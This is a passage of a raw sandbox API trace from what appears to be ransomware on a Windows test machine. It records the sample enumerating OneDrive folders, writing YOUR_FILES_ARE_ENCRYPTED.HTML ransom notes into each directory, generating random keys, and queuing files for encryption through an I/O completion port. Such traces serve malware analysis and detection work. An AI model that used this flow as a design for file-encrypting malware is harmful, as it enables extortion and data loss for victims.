(lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ru\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\ru\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.738] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.738] CloseHandle (hObject=0x330) returned 1 [0112.739] GetProcessHeap () returned 0x600000 [0112.739] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.739] GetProcessHeap () returned 0x600000 [0112.750] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.750] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bf5de5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x17bf5de5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x17bf5de5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="rw", cAlternateFileName="")) returned 1 [0112.750] StrStrIW (lpFirst="rw", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.754] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\rw") returned 78 [0112.754] GetProcessHeap () returned 0x600000 [0112.754] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.756] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\rw" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\rw") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\rw" [0112.756] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\rw", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\rw\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\rw\\*" [0112.756] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\rw\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bf5de5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x17bf5de5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1954aec9, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xffeedaaf, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.756] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bf5de5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x17bf5de5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1954aec9, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xffeedaaf, cFileName="..", cAlternateFileName="")) returned 1 [0112.757] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1954aec9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1954aec9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1986bebc, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xffeedaaf, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.757] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.757] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\rw\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.757] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.757] lstrlenW (lpString=".mui") returned 4 [0112.757] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.757] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1954aec9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1954aec9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1986bebc, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xffeedaaf, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.757] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.757] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\rw\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.757] GetProcessHeap () returned 0x600000 [0112.757] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\rw\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\rw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.758] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.759] CloseHandle (hObject=0x328) returned 1 [0112.759] GetProcessHeap () returned 0x600000 [0112.759] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.759] GetProcessHeap () returned 0x600000 [0112.759] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.760] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x126710a5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x126710a5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x130c8fc0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x124b, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ScreenshotLogo.png", cAlternateFileName="SCREEN~1.PNG")) returned 1 [0112.760] StrStrIW (lpFirst="ScreenshotLogo.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.760] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotLogo.png") returned 94 [0112.760] PathFindExtensionW (pszPath="ScreenshotLogo.png") returned=".png" [0112.760] lstrlenW (lpString=".png") returned 4 [0112.760] PathFindExtensionW (pszPath="ScreenshotLogo.png") returned=".png" [0112.760] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotLogo.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\screenshotlogo.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0112.760] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=4683) returned 1 [0112.760] GetProcessHeap () returned 0x600000 [0112.760] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0112.763] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="09") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="DF") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="B2") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="24") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="11") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="CB") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="D5") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="4E") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="13") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="0C") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="BC") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="E3") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="48") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="DB") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="50") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="AA") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="AF") returned 2 [0112.763] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="B7") returned 2 [0112.764] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="6F") returned 2 [0112.764] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="26") returned 2 [0112.764] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="F7") returned 2 [0112.764] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="BB") returned 2 [0112.764] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="09") returned 2 [0112.764] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="2F") returned 2 [0112.764] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="EB") returned 2 [0112.764] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="2B") returned 2 [0112.764] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="CF") returned 2 [0112.764] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="EE") returned 2 [0112.764] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="C9") returned 2 [0112.764] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="F7") returned 2 [0112.764] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="D2") returned 2 [0112.764] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="6A") returned 2 [0112.764] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotLogo.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotLogo.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotLogo.png" [0112.764] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.764] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0112.764] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1347c6a3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1347c6a3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x140b472d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x6c00a, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ScreenshotOptIn.png", cAlternateFileName="SCREEN~2.PNG")) returned 1 [0112.765] StrStrIW (lpFirst="ScreenshotOptIn.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.765] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotOptIn.png") returned 95 [0112.765] PathFindExtensionW (pszPath="ScreenshotOptIn.png") returned=".png" [0112.765] lstrlenW (lpString=".png") returned 4 [0112.765] PathFindExtensionW (pszPath="ScreenshotOptIn.png") returned=".png" [0112.765] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotOptIn.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\screenshotoptin.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0112.766] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=442378) returned 1 [0112.766] GetProcessHeap () returned 0x600000 [0112.766] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0112.769] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="A0") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="7E") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="C6") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="E0") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="1C") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="4E") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="78") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="05") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="08") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="90") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="E4") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="88") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="47") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="2D") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="BE") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="05") returned 2 [0112.769] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="11") returned 2 [0112.770] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="26") returned 2 [0112.770] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="FE") returned 2 [0112.770] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="4A") returned 2 [0112.770] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="91") returned 2 [0112.770] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="A3") returned 2 [0112.770] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="71") returned 2 [0112.770] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="A5") returned 2 [0112.770] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="45") returned 2 [0112.770] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="4D") returned 2 [0112.770] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="7A") returned 2 [0112.770] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="47") returned 2 [0112.770] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="9B") returned 2 [0112.770] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="C8") returned 2 [0112.770] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="DE") returned 2 [0112.770] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="50") returned 2 [0112.770] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotOptIn.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotOptIn.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotOptIn.png" [0112.770] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.771] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0112.771] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1986bebc, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1986bebc, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1986bebc, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="sd-arab", cAlternateFileName="")) returned 1 [0112.771] StrStrIW (lpFirst="sd-arab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.771] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab") returned 83 [0112.771] GetProcessHeap () returned 0x600000 [0112.771] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0112.771] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab" [0112.771] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab\\*" [0112.771] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1986bebc, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1986bebc, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1aec60c3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1a27ec3, cFileName=".", cAlternateFileName="")) returned 0x626778 [0112.772] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1986bebc, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1986bebc, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1aec60c3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1a27ec3, cFileName="..", cAlternateFileName="")) returned 1 [0112.772] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aec60c3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1aec60c3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1bb96a1e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x1a27ec3, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.772] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.772] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab\\FileSync.LocalizedResources.dll.mui") returned 119 [0112.772] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.772] lstrlenW (lpString=".mui") returned 4 [0112.772] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.772] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aec60c3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1aec60c3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1bb96a1e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x1a27ec3, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.772] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0112.772] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0112.772] GetProcessHeap () returned 0x600000 [0112.772] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.773] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\sd-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0112.773] WriteFile (in: hFile=0x334, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.774] CloseHandle (hObject=0x334) returned 1 [0112.774] GetProcessHeap () returned 0x600000 [0112.774] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.774] GetProcessHeap () returned 0x600000 [0112.774] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0112.774] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1bc7bb71, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1bc7bb71, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1bc7bb71, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="sd-arab-pk", cAlternateFileName="SD-ARA~1")) returned 1 [0112.774] StrStrIW (lpFirst="sd-arab-pk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.774] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab-pk") returned 86 [0112.774] GetProcessHeap () returned 0x600000 [0112.774] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, 